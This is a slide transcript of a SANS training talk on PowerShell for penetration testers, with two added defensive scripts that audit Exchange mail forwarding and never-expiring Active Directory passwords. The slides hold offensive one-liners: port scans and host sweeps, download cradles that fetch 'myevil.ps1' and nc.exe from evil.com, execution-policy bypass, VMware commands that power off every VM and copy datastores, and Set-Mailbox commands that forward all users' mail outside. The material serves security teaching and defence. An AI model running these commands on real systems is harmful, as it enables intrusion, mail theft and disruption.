Tim Medin - SANS Information Security Training (slide transcript)
Tim Medin
Background
Counter Hack Challenges
Pen Tester – Internal, Perimeter, Web, Social, Telephony
Corp Security – Financial Services
Network Engineer – Higher Education
Software Engineer – Manufacturing & Industrial
Control Systems Engineer
Contributions: Laudanum, CommandLineKungFu.com, Packetstan.com, other blogs
Local DefCon and Security Groups
CCDC – Local Universities
Coolness of PowerShell
Basics of PowerShell
Quick Command Line Attacks
Script Execution
3rd Party CmdLets
CMD is teh sUck!!1!
Need upgrade, badly
Nothing is standard
▪ Naming
▪ Switches
▪ Switch operators: dash v. slash
Why would you want to parse anything? Are you too good for the For Loop!
Installed by default on Windows 7, Server 2008 R2, and later
Full integration with Microsoft server products: Exchange, SharePoint, Active Directory
Third party apps too: VMware!
Full access to the .NET Framework
In short, FUN!
Basics of PowerShell
“CmdLets” are quite standard
PowerShell naming convention: names are Verb-Noun
Verbs standardized by Microsoft
▪ Get vs. Read
▪ Find vs. Search
Common parameter names
Help
We don’t have to parse text!
Easily string together many commands
Easier to read: $_.Length vs. cut -d' ' -f4
Don’t have to know what the 4th item in the output is, as with cut or awk
Just like other shells, but… Objects!
Find files containing “blah”:
Get-ChildItem | Select-String blah -List
Find files containing “blah”… and delete them:
Get-ChildItem | Select-String blah -List | Remove-Item
Variables: prefixed with $
Dot access properties and methods of an object
$_ – the current pipeline object, used in script blocks, filters (Where-Object), ForEach-Object, and switches
$true, $false, $null
See them all with: Get-ChildItem variable:
| PowerShell    | PowerShell Alias | CMD           | *nix |
|---------------|------------------|---------------|------|
| Get-ChildItem | ls, gci, dir     | dir           | ls   |
| Copy-Item     | cp, copy, cpi    | copy          | cp   |
| Move-Item     | move, mv, mi     | move          | mv   |
| Select-String | <none>           | find, findstr | grep |
| Get-Help      | man, help        | help          | man  |
| Get-Content   | cat, gc, type    | type          | cat  |

Easy! Aliases match CMD and Bash
ForEach-Object (alias %): operates on each object passed down the pipeline. Not to be confused with ForEach, a looping statement.
Get-ChildItem | ForEach-Object { "do something with " + $_.Name }
ls | % { "do something with " + $_.Name }
Where-Object (alias ?): used to filter objects passed down the pipeline
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*" }
Out-*: output to file, host, printer, …
Export-CSV: exports objects, with names and properties; Import-CSV can read it back in
Group-Object: groups objects together based on properties
Sort-Object
Get-Member (alias gm): gets all the properties and methods of an object type
Available properties and methods on files: ls | gm
Format-List (alias fl): outputs the properties of all the objects passed down the pipeline, only the “default” properties
Use * to see all the properties: ls | fl *
Get-Command: gets a list of commands (DUH!)
With no parameters it lists everything
-Noun <string>
-Verb <string>
-Module <string>: all cmdlets in a module (e.g. Exchange, VMware, etc.)
Very useful for finding the cmdlet you need!
Get-Help can be used on aliases too (e.g. ls, mv)
Default output isn’t really useful
Useful switches: -Examples (-ex for short), -Full
Aliases
Parameters: need as much of the name as necessary to uniquely identify it.
✗ ls -f    “f” matches Filter & Force
✔ ls -fo   “fo” only matches Force
✔ ls -for  “for” only matches Force
Tab completion works for CmdLets AND PARAMETERS! It lets you cycle through matching names
You complete me!
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open
Pseudo code: 1..1024 | foreach-object { print (connection_attempt, “port is open”) }, and discard the error messages
The trick:
PS C:\> echo (1+1) (2+2)
2
4
PS C:\> echo (1/0) (2+2)
Attempt to divide by zero.   <- 2+2 is not output
When the first argument throws, the whole echo statement is abandoned, so "$_ is open" is printed only when Connect() succeeds.
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
Access a text file like this (to stdout):
(New-Object System.Net.WebClient).DownloadString("http://mysite.com/myevil.ps1")
To save it to a file:
… | Out-File -Encoding ASCII myfile.ps1
What if we want to download an executable?
(New-Object System.Net.WebClient).DownloadFile("http://mysite.com/nc.exe", "c:\nc.exe")
…but, we can’t PowerShell with netcat
Wants a terminal
From Meterpreter, go BOOM
What about a script?
Default Execution Policy stops scripts
Default mode is “Restricted”
Change it to allow local, unsigned scripts with Set-ExecutionPolicy RemoteSigned
▪ Changing requires Admin Permissions
BUT…
Get-Help about_Execution_Policies
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3
C:\> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe')"
C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3
-a---         3/23/2012  12:10 PM      61440 nc.exe
Run a script without running a script: uses Encoded Command
DefCon 18 talk by Dave Kennedy (ReL1K) and Josh Kelley (Winfang)
Windump: dumps the SAM via PowerShell, but has problems
Interface to VMware vSphere. Extremely Powerful!
Commands:
Connect-VIServer vc1 -User tm -Password pw
Get-VM
Get-VM | Stop-VM -Confirm:$false   <- Power off everything. DON’T RUN THIS!
I want data… data is on the servers… so get the whole server?
$ds = Get-Datastore <datastore-name>
New-PSDrive -Name MyDS -PSProvider VimDatastore -Root '\' -Location $ds
Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp
Firewall-Shmirewall! Runs a PowerShell script IN the guest OS of each of the specified virtual machines
It does require credentials to access the guest. We can probably get those when we download the VM.
Why yes, I’d like all your email
Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
Why yes, I’d like EVERYONE’S email
Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
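An added audit example (mine, not from the deck) that is the defender's counterpart to the two Set-Mailbox one-liners above: it lists every mailbox, and every inbox rule, that forwards or redirects mail elsewhere, which is exactly the state those commands leave behind. It assumes an Exchange Management Shell or remote session that exposes Get-Mailbox and Get-InboxRule; the function name and CSV path are my own.

```powershell
# Added example, not from the deck: find mailbox-level and rule-level
# forwarding so an unexpected -ForwardingAddress stands out.
function Get-MailForwarding {
    param([string] $Csv)   # optional: also write the findings to this CSV

    $all = Get-Mailbox -ResultSize Unlimited

    # Mailbox-level forwarding: the state Set-Mailbox leaves behind on the slide.
    $mailboxLevel = $all |
        Where-Object { $_.ForwardingAddress -or $_.ForwardingSmtpAddress } |
        ForEach-Object {
            [pscustomobject]@{
                Mailbox  = $_.PrimarySmtpAddress
                Kind     = 'Mailbox'
                Target   = "$($_.ForwardingAddress) $($_.ForwardingSmtpAddress)".Trim()
                KeepCopy = $_.DeliverToMailboxAndForward
                Changed  = $_.WhenChanged
            }
        }

    # Rule-level forwarding: same outcome, set per user, easy to miss.
    $ruleLevel = $all | ForEach-Object {
        Get-InboxRule -Mailbox $_.Identity -ErrorAction SilentlyContinue |
            Where-Object { $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo } |
            ForEach-Object {
                $targets = @($_.ForwardTo) + @($_.ForwardAsAttachmentTo) + @($_.RedirectTo) |
                    Where-Object { $_ }
                [pscustomobject]@{
                    Mailbox  = $_.MailboxOwnerId
                    Kind     = "Rule: $($_.Name)"
                    Target   = ($targets -join ';')
                    KeepCopy = -not $_.RedirectTo   # redirect moves mail, forward copies it
                    Changed  = $null
                }
            }
    }

    $findings = @($mailboxLevel) + @($ruleLevel)
    if ($Csv) { $findings | Export-Csv -NoTypeInformation -Path $Csv }
    $findings
}

# Review the list, then clear anything unexpected with
# Set-Mailbox <id> -ForwardingAddress $null -ForwardingSmtpAddress $null
Get-MailForwarding -Csv .\forwarding.csv | Format-Table -AutoSize
```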
Requires Domain Admin Permissions
Providers
Microsoft – requires one of the following
▪ Windows 2008 R2 Domain Controller
▪ Windows 2008 R2 Server running Lightweight Directory Services
Quest – client only (better for pen testing)
List all users in a pretty CSV:
Get-ADUser -Filter * | Export-CSV us.csv   <- MS
Get-QADUser | Export-CSV us.csv   <- Quest
All users without password expirations Get-QADUser -Enabled -PasswordNeverExpires:$true
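An added example (mine, not from the deck) that runs the same "password never expires" query against the Microsoft ActiveDirectory module instead of Quest, adds the columns a reviewer wants (password age, last logon, direct membership in an admin group) and exports the CSV from the earlier slide; the function name and the 365-day threshold are my own choices.

```powershell
# Added example, not from the deck: enabled accounts whose passwords never
# expire, with enough context to decide which ones need attention.
Import-Module ActiveDirectory

function Get-NonExpiringPasswordUser {
    param([int] $StaleDays = 365)   # flag passwords older than this
    $now = Get-Date
    Get-ADUser -Filter { Enabled -eq $true -and PasswordNeverExpires -eq $true } `
               -Properties PasswordLastSet, LastLogonDate, MemberOf, Description |
        ForEach-Object {
            $age = if ($_.PasswordLastSet) { [int]($now - $_.PasswordLastSet).TotalDays } else { $null }
            # MemberOf is direct membership only; nested groups are not expanded here.
            $admin = [bool]($_.MemberOf |
                Where-Object { $_ -match '^CN=(Domain Admins|Enterprise Admins|Administrators),' })
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                Name            = $_.Name
                PasswordAgeDays = $age
                Stale           = ($null -eq $age) -or ($age -gt $StaleDays)
                LastLogonDate   = $_.LastLogonDate
                PrivilegedGroup = $admin
                Description     = $_.Description
            }
        } | Sort-Object Stale, PasswordAgeDays -Descending
}

# Same report as the Get-QADUser one-liner, exported like the earlier slide,
# then the subset worth looking at first.
$users = Get-NonExpiringPasswordUser
$users | Export-Csv -NoTypeInformation -Path .\never-expires.csv
$users | Where-Object { $_.Stale -or $_.PrivilegedGroup } | Format-Table -AutoSize
```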
PowerShell is a significant upgrade from CMD
We can use the same CMD Fu, but it’s easier (albeit more verbose)
Lots of interaction with other products
@timmedin
SEC 560: Network Penetration Testing Ethical Hacking – Dallas, June 18 – 23
SEC 504: Hacker Techniques, Exploits and Incident Handling – Raleigh, July 16 – 21
Brute force VMware creds: http://blog.securitywhole.com/2009/09/01/brute-force-esx-usernamepassword.aspx
PowerShell, it’s time to own: http://www.secmaniac.com/files/PowerShell_Defcon.pdf
Command Line Kung Fu Blog: http://www.commandlinekungfu.com
Hey! Scripting Guy!: http://blogs.technet.com/b/heyscriptingguy